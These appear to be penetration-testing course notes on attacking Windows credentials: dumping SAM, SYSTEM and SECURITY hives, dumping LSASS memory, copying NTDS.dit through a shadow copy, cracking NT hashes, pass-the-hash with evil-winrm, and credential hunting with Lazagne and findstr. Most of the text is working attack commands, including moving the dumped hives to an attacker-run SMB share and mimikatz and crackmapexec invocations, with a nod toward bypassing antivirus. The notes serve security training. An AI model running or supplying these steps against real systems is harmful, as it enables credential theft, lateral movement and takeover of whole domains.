Windows Local Password Attacks

Attacking SAM

With access to a non-domain joined Windows system, we may benefit from attempting to quickly dump the files associated with the SAM database to transfer them to our attack host and start cracking hashes offline. Doing this offline will ensure we can continue to attempt our attacks without maintaining an active session with a target. Let's walk through this process together using a target host.

Copying SAM Registry Hives

There are three registry hives that we can copy if we have local admin access on the target; each will have a specific purpose when we get to dumping and cracking the hashes. Here is a brief description of each in the table below:

We can create backups of these hives using the reg.exe utility.

Launching cmd.exe as admin:

reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

Technically we will only need hklm\sam & hklm\system, but hklm\security can also be helpful to save as it can contain hashes associated with cached domain user account credentials present on domain-joined hosts.

Lets transfer them (this is only one possible method):

Creating a Share with smbserver.py

On Kali linux, there's a symlink to a script that simplifies using impacket:

sudo impacket-smbserver -smb2support CompData /home/ltnbob/Documents/

otherwise it can be manually found here:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

• CompData Share name

• /home/ltnbob/Documents Target folder

• -smb2support ensures newer SMB support

move sam.save \\10.10.15.16\CompData
move security.save \\10.10.15.16\CompData
move system.save \\10.10.15.16\CompData

Dumping Hashes with Impacket's secretsdump.py

Again, on Kali Linux we have a shortcut:

sudo impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

Notice the first step secretsdump executes is targeting the system bootkey before proceeding to dump the LOCAL SAM hashes. It cannot dump those hashes without the boot key because that boot key is used to encrypt & decrypt the SAM database, which is why it is important for us to have copies of the registry hives we discussed earlier in this section.

Notice at the top of the secretsdump.py output:

Dumping local SAM hashes (uid:rid:lmhash:nthash)

This tells us how to read the output and what hashes we can crack. Most modern Windows operating systems store the password as an NT hash. Operating systems older than Windows Vista & Windows Server 2008 store passwords as an LM hash, so we may only benefit from cracking those if our target is an older Windows OS.

Knowing this, we can copy the NT hashes associated with each user account into a text file and start cracking passwords. It may be beneficial to make a note of each user, so we know which password is associated with which user account.

Cracking Hashes with Hashcat

awk command to save the nt hashes

awk '{ split($0, arr, ":"); print arr[4]; }' userhashlist.txt

sudo hashcat -m 1000 userhashlist.txt /usr/share/wordlists/rockyou.txt

(rockyou.txt is usually compressed in Kali Linux, you need to extract it)

Having the passwords could be useful to us in many ways. We could attempt to use the passwords we cracked to access other systems on the network. It is very common for people to re-use passwords across different work & personal accounts. Knowing this technique, we covered can be useful on engagements. We will benefit from using this any time we come across a vulnerable Windows system and gain admin rights to dump the SAM database.

Remote Dumping & LSA Secrets Considerations

With access to credentials with local admin privileges, it is also possible for us to target LSA Secrets over the network. This could allow us to extract credentials from a running service, scheduled task, or application that uses LSA secrets to store passwords.

crackmapexec smb <targetIP> --local-auth -u <user> -p <password> --lsa

We can also dump hashes from the SAM database remotely.

crackmapexec smb <targetIP> --local-auth -u <user> -p <password> --sam

Mimikatz hash dump

Launch mimikatz then

privilege::debug
sekurlsa::logonpasswords

Attacking LSASS

In addition to getting copies of the SAM database to dump and crack hashes, we will also benefit from targeting LSASS. LSASS is a critical service that plays a central role in credential management and the authentication processes in all Windows operating systems.

Upon initial logon, LSASS will:

• Cache credentials locally in memory

• Create access tokens

• Enforce security policies

• Write to Windows security log

Let's cover some of the techniques and tools we can use to dump LSASS memory and extract credentials from a target running Windows.

Dumping LSASS Process Memory

Task Manager Method

A file called lsass.DMP is created and saved in:

C:\Users\loggedonusersdirectory\AppData\Local\Temp

Rundll32.exe & Comsvcs.dll Method

Before issuing the command to create the dump file, we must determine what process ID (PID) is assigned to lsass.exe. This can be done from cmd or PowerShell (in order):

tasklist /svc

Get-Process lsass

Then to dump:

rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full

Recall that most modern AV tools recognize this as malicious and prevent the command from executing. In these cases, we will need to consider ways to bypass or disable the AV tool we are facing. AV bypassing techniques are outside of the scope of this module.

Using Pypykatz to Extract Credentials

Once we have the dump file on our attack host, we can use a powerful tool called pypykatz to attempt to extract credentials from the .dmp file.

pypykatz lsa minidump /home/peter/Documents/lsass.dmp

• lsa in the command because LSASS is a subsystem of local security authority

• specify the data source as a minidump

Useful information in the output:

• MSV is an authentication package in Windows that LSA calls on to validate logon attempts against the SAM database.

• WDIGEST is an older authentication protocol enabled by default in Windows XP - Windows 8 and Windows Server 2003 - Windows Server 2012. LSASS caches credentials used by WDIGEST in clear-text.

• Kerberos is a network authentication protocol used by Active Directory in Windows Domain environments. Domain user accounts are granted tickets upon authentication with Active Directory. This ticket is used to allow the user to access shared resources on the network that they have been granted access to without needing to type their credentials each time. LSASS caches passwords, ekeys, tickets, and pins associated with Kerberos. It is possible to extract these from LSASS process memory and use them to access other systems joined to the same domain.

• The Data Protection Application Programming Interface or DPAPI is a set of APIs in Windows operating systems used to encrypt and decrypt DPAPI data blobs on a per-user basis for Windows OS features and various third-party applications. Mimikatz and Pypykatz can extract the DPAPI masterkey for the logged-on user whose data is present in LSASS process memory. This masterkey can then be used to decrypt the secrets associated with each of the applications using DPAPI and result in the capturing of credentials for various accounts.\

Cracking the NT Hash with Hashcat

Same as above:

sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

Attacking Active Directory & NTDS.dit

How we can extract credentials through the use of a dictionary attack against AD accounts and dumping hashes from the NTDS.dit file.

Once a Windows system is joined to a domain, it will no longer default to referencing the SAM database to validate logon requests.

Dictionary Attacks against AD accounts using CrackMapExec

Keep in mind that a dictionary attack is essentially using the power of a computer to guess a username &/or password using a customized list of potential usernames and passwords. It can be rather noisy (easy to detect) to conduct these attacks over a network because they can generate a lot of network traffic and alerts on the target system as well as eventually get denied due to login attempt restrictions that may be applied through the use of Group Policy.

When we find ourselves in a scenario where a dictionary attack is a viable next step, we can benefit from trying to custom tailor our attack as much as possible.

Example of possible usernames, could help from OSINT.

Often, an email address's structure will give us the employee's username (structure: username@domain). For example, from the email address jdoe@inlanefreight.com, we see that jdoe is the username.

We can manually create our list(s) or use an automated list generator such as the Ruby-based tool Username Anarchy to convert a list of real names into common username formats.

./username-anarchy -i /home/ltnbob/names.txt 

Launching the Attack with CrackMapExec

crackmapexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txt

What is left behind

It can be useful to know what might have been left behind by an attack. Knowing this can make our remediation recommendations more impactful and valuable for the client we are working with.

On any Windows operating system, an admin can navigate to Event Viewer and view the Security events to see the exact actions that were logged.

Once we have discovered some credentials, we could proceed to try to gain remote access to the target domain controller and capture the NTDS.dit file.

Capturing NTDS.dit

NT Directory Services (NTDS) is the directory service used with AD to find & organize network resources.

Recall that NTDS.dit file is stored at %systemroot%/ntds on the domain controllers in a forest.

This is the primary database file associated with AD and stores all domain usernames, password hashes, and other critical schema information. If this file can be captured, we could potentially compromise every account on the domain similar to the technique we covered in this module's Attacking SAM section.

Connecting to a DC

evil-winrm -i 10.129.201.57  -u bwilliamson -p 'P@55w0rd!'

Checking Local Group Membership

Once connected, we can check to see what privileges bwilliamson has. We can start with looking at the local group membership using the command:

net localgroup

We are looking to see if the account has local admin rights. To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights. We also will want to check what domain privileges we have.

net user bwilliamson

Creating Shadow Copy of C:

We can use vssadmin to create a Volume Shadow Copy (VSS) of the C: drive or whatever volume the admin chose when initially installing AD. It is very likely that NTDS will be stored on C: as that is the default location selected at install, but it is possible to change the location. We use VSS for this because it is designed to make copies of volumes that may be read & written to actively without needing to bring a particular application or system down.

vssadmin CREATE SHADOW /For=C:

Copying NTDS.dit from the VSS

cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

You can move this file in many ways, one of which was presented in Attacking SAM

A Faster Method: Using cme to Capture NTDS.dit

crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds

Cracking Hashes & Gaining Credentials

usual NT hashes procedure, either a file or single one:

sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt

Pass-the-Hash Considerations

Useful if cannot crack the hash

A PtH attack takes advantage of the NTLM authentication protocol to authenticate a user using a password hash. Instead of username:clear-text password as the format for login, we can instead use username:password hash. Here is an example of how this would work:

evil-winrm -i 10.129.201.57  -u  Administrator -H "64f12cddaa88057e06a81b54e73b949b"

Credential harvesting in Windows

Search Centric

Here are some helpful key terms we can use that can help us discover some credentials:

We can start by using Windows search

We can also take advantage of third-party tools like Lazagne to quickly discover credentials that web browsers or other installed applications may insecurely store. It would be beneficial to keep a standalone copy of Lazagne on our attack host so we can quickly transfer it over to the target

start lazagne.exe all

This will execute Lazagne and run all included modules. We can include the option -vv to study what it is doing in the background. Once we hit enter, it will open another prompt and display the results.

Using findstr

We can also use findstr to search from patterns across many types of files. Keeping in mind common key terms, we can use variations of this command to discover credentials on a Windows target:

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

Here are some other places we should keep in mind when credential hunting:

• Passwords in Group Policy in the SYSVOL share

• Passwords in scripts in the SYSVOL share

• Password in scripts on IT shares

• Passwords in web.config files on dev machines and IT shares

• unattend.xml

• Passwords in the AD user or computer description fields

• KeePass databases --> pull hash, crack and get loads of access.

• Found on user systems and shares

• Files such as pass.txt, passwords.docx, passwords.xlsx found on user systems, shares, Sharepoint